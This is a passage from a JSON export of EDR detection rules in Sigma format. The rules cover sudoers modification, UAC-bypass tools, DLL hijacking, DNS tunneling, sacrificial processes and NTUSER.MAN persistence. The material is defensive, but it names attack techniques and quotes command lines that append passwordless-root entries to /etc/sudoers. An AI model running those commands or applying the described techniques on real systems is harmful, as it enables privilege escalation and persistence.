'/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_common:\n - ProcessImage:\n - '/usr/bin/rm'\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/bin/chown'\n - '/usr/bin/chown'\n - '/kaniko/executor'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/podman'\n - '/usr/bin/touch'\n - '/usr/bin/dpkg-statoverride'\n - '/usr/sbin/cfagent'\n - '/usr/sbin/adsysd'\n - '/bin/busybox'\n - '/usr/bin/rsync'\n - '/usr/bin/dos2unix'\n - '/snap/snapd/*/usr/lib/snapd/snap-confine'\n - ProcessGrandparentImage:\n - '/kaniko/executor'\n - '/usr/bin/runc'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/podman'\n\n # template_exclusion_ansible\n\n exclusion_salt:\n - ProcessCommandLine: '/usr/bin/python* /usr/bin/salt-minion'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n exclusion_cloud-init:\n ProcessCommandLine|startswith: '/usr/bin/python? /usr/bin/cloud-init'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_sophos:\n ProcessParentImage: '/opt/sophos-av/engine/_/savd.?'\n\n exclusion_aws:\n ProcessParentImage: '/usr/bin/ssm-agent-worker'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n TargetPath:\n - '/etc/sudoers~'\n - '/etc/sudoers.d/*~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/etc/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/sed??????'\n\n exclusion_cyberwatch:\n ProcessGrandparentCommandLine|contains:\n - '|| echo \"# cyberwatch privileges\" | sudo tee -a /etc/sudoers'\n - '|| echo \"Defaults:cyberwatch !requiretty\" | sudo tee -a /etc/sudoers'\n - '|| echo \"cyberwatch ALL=(ALL) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers'\n\n exclusion_buildah:\n ProcessGrandparentImage: '/usr/bin/buildah'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bb34ffc-2356-4191-b774-bc4fc82ee828",
"rule_name": "Sudo Configuration Modified (Linux)",
"rule_description": "Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to investigate the process responsible for this action for suspicious activities.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bbd2cab-7189-4801-aff8-def8972e59db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606241Z",
"creation_date": "2026-03-23T11:45:34.606245Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606252Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_akagi.yml",
"content": "title: UACMe HackTool Executed\nid: 2bbd2cab-7189-4801-aff8-def8972e59db\ndescription: |\n Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\n UACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\n It is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\n It is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.UACMe\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Akagi.exe'\n InternalName: 'Akagi'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bbd2cab-7189-4801-aff8-def8972e59db",
"rule_name": "UACMe HackTool Executed",
"rule_description": "Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\nUACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\nIt is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\nIt is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\n",
"rule_creation_date": "2021-10-27",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bc7247d-de5a-436c-a772-bb81fb27eda8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609754Z",
"creation_date": "2026-03-23T11:45:34.609757Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609765Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_runlegacycplelevated.yml",
"content": "title: RunLegacyCPLElevated Executed\nid: 2bc7247d-de5a-436c-a772-bb81fb27eda8\ndescription: |\n Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\n Adversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\n It is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\nreferences:\n - https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2025/03/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RunLegacyCPLElevated\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessName: 'RunLegacyCPLElevated.EXE'\n - ProcessOriginalFileName: 'RunLegacyCPLElevated.EXE'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bc7247d-de5a-436c-a772-bb81fb27eda8",
"rule_name": "RunLegacyCPLElevated Executed",
"rule_description": "Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\nAdversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\nIt is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\n",
"rule_creation_date": "2025-03-10",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bdea909-ca39-4efc-bb11-094f0831e19b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593230Z",
"creation_date": "2026-03-23T11:45:34.593234Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593242Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_getmac.yml",
"content": "title: DLL Hijacking via getmac.exe\nid: 2bdea909-ca39-4efc-bb11-094f0831e19b\ndescription: |\n Detects potential Windows DLL Hijacking via getmac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'getmac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bdea909-ca39-4efc-bb11-094f0831e19b",
"rule_name": "DLL Hijacking via getmac.exe",
"rule_description": "Detects potential Windows DLL Hijacking via getmac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c30d455-a333-49ed-82ac-70467657685d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612914Z",
"creation_date": "2026-03-23T11:45:34.612918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612956Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1568/003/"
],
"name": "t1071_004_long_dns_request_linux.yml",
"content": "title: Abnormally Long DNS Name Resolved (Linux)\nid: 2c30d455-a333-49ed-82ac-70467657685d\ndescription: |\n Detects an abnormally long DNS query, usually associated with DNS tunneling.\n Adversaries may use DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n ProcessImage|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n exclusion_neterror:\n QueryName|startswith: 'about:neterror\\?e=redirectloop&u=https%3a//'\n\n exclusion_glpi:\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n - ProcessParentImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n\n exclusion_nagios:\n ProcessParentImage: '/usr/sbin/nrpe'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c30d455-a333-49ed-82ac-70467657685d",
"rule_name": "Abnormally Long DNS Name Resolved (Linux)",
"rule_description": "Detects an abnormally long DNS query, usually associated with DNS tunneling.\nAdversaries may use DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-09-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079552Z",
"creation_date": "2026-03-23T11:45:34.079554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_openwith.yml",
"content": "title: OpenWith.exe Sacrificial Process Spawned\nid: 2c3aa5ca-f30f-4e2e-924d-43c8087144f4\ndescription: |\n Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\OpenWith.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n exclusion_rpcnet:\n ProcessAncestors: '?:\\Windows\\SysWOW64\\svchost.exe|?:\\Windows\\SysWOW64\\rpcnet.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4",
"rule_name": "OpenWith.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626477Z",
"creation_date": "2026-03-23T11:45:34.626479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626483Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://deceptiq.com/blog/ntuser-man-registry-persistence",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_registry_mandatory_profile.yml",
"content": "title: User Registry Hive Hijacked via Mandatory Profile\nid: 2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6\ndescription: |\n Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\n Attackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\n It is recommended to validate whether the file creation is legitimate within your environment.\nreferences:\n - https://deceptiq.com/blog/ntuser-man-registry-persistence\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2026/01/08\nmodified: 2026/01/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Path: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'create'\n - TargetPath: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'rename'\n\n exclusion_profsvc:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6",
"rule_name": "User Registry Hive Hijacked via Mandatory Profile",
"rule_description": "Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\nAttackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\nIt is recommended to validate whether the file creation is legitimate within your environment.\n",
"rule_creation_date": "2026-01-08",
"rule_modified_date": "2026-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2cacb51e-86d2-4851-9e44-b3544e02427f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091445Z",
"creation_date": "2026-03-23T11:45:34.091447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091452Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fltmc.yml",
"content": "title: DLL Hijacking via fltmc.exe\nid: 2cacb51e-86d2-4851-9e44-b3544e02427f\ndescription: |\n Detects potential Windows DLL Hijacking via fltmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fltmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FLTLIB.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2cacb51e-86d2-4851-9e44-b3544e02427f",
"rule_name": "DLL Hijacking via fltmc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fltmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
